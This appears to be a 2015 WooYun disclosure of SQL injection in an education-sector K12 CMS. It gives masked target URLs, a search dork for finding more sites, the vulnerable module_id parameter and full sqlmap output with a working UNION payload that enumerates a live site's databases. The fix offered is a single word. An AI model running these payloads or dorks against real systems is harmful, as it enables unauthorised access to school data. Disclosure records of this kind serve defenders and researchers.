漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0144927
漏洞标题:某教育单位系统CMS存在注入
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2015-10-09 22:32
修复时间:2016-01-12 08:44
公开时间:2016-01-12 08:44
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-17: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航)
2015-12-08: 细节向核心白帽子及相关领域专家公开
2015-12-18: 细节向普通白帽子公开
2015-12-28: 细节向实习白帽子公开
2016-01-12: 细节向公众公开
简要描述:
66666666666666
详细说明:
案例:
http://**.**.**.**//platform/app/register.php
**.**.**.**/platform/app/register.php
**.**.**.**/platform/app/register.php
**.**.**.**//platform/app/register.php
**.**.**.**/platform/app/register.php
**.**.**.**/platform/app/register.php
如果还需要google
http://g.kvm.la/#q=%E2%80%9C%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89:K12%E4%B8%AD%E5%9B%BD%E4%B8%AD%E5%B0%8F%E5%AD%A6%E6%95%99%E8%82%B2%E6%95%99%E5%AD%A6%E7%BD%91%22&start=20
http://**.**.**.**/bugs/wooyun-2014-047711
http://**.**.**.**/bugs/wooyun-2014-050127
http://**.**.**.**/bugs/wooyun-2010-060202
跟这些的位置不一样但是是一个厂商。
漏洞证明:
先注册个帐号,然后登录。
然后这个module_id参数存在注入。
/platform/index.php?t=plist_do&module_id=1
E:\qy\sqlmapproject-sqlmap-b1d13d1>cmd
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
E:\qy\sqlmapproject-sqlmap-b1d13d1>sqlmap.py -r 222.txt --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150213}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 19:18:07
222.txt
[19:18:07] [INFO] parsing HTTP request from '222.txt'
222.txt
custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q]
[19:18:09] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n]
[19:18:18] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[19:18:19] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[19:18:21] [INFO] testing if URI parameter '#1*' is dynamic
[19:18:21] [INFO] confirming that URI parameter '#1*' is dynamic
[19:18:22] [WARNING] URI parameter '#1*' does not appear dynamic
[19:18:22] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
not be injectable
[19:18:22] [INFO] testing for SQL injection on URI parameter '#1*'
[19:18:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:18:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:18:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:18:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[19:18:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[19:18:31] [INFO] testing 'MySQL inline queries'
[19:18:31] [INFO] testing 'PostgreSQL inline queries'
[19:18:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:18:32] [INFO] testing 'Oracle inline queries'
[19:18:32] [INFO] testing 'SQLite inline queries'
[19:18:32] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:18:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[19:18:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[19:18:36] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[19:18:38] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:18:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:18:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:18:42] [INFO] testing 'Oracle AND time-based blind'
[19:18:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:18:48] [INFO] target URL appears to be UNION injectable with 5 columns
[19:18:51] [INFO] URI parameter '#1*' is 'MySQL UNION query (NULL) - 1 to 10 col
umns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 120 HTTP(s) req
uests:
---
Parameter: #1* (URI)
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: **.**.**.**:80/platform/index.php?t=plist_do&module_id=-72
85 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71717a7171,0x44635253584363674b5a,0x
716a706b71),NULL#
---
[19:33:56] [INFO] testing MySQL
[19:33:57] [INFO] confirming MySQL
[19:33:58] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 4.3.3, Apache 1.3.28
back-end DBMS: MySQL < 5.0.0
[19:33:58] [WARNING] information_schema not available, back-end DBMS is MySQL <
5. database names will be fetched from 'mysql' database
[19:33:58] [INFO] the SQL query used returns 1 entries
available databases [1]:
[*] K12JWT
[19:33:59] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 19:33:59
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-10-14 08:42
厂商回复:
暂未建立与网站管理单位的直接处置渠道,待认领.
最新状态:
暂无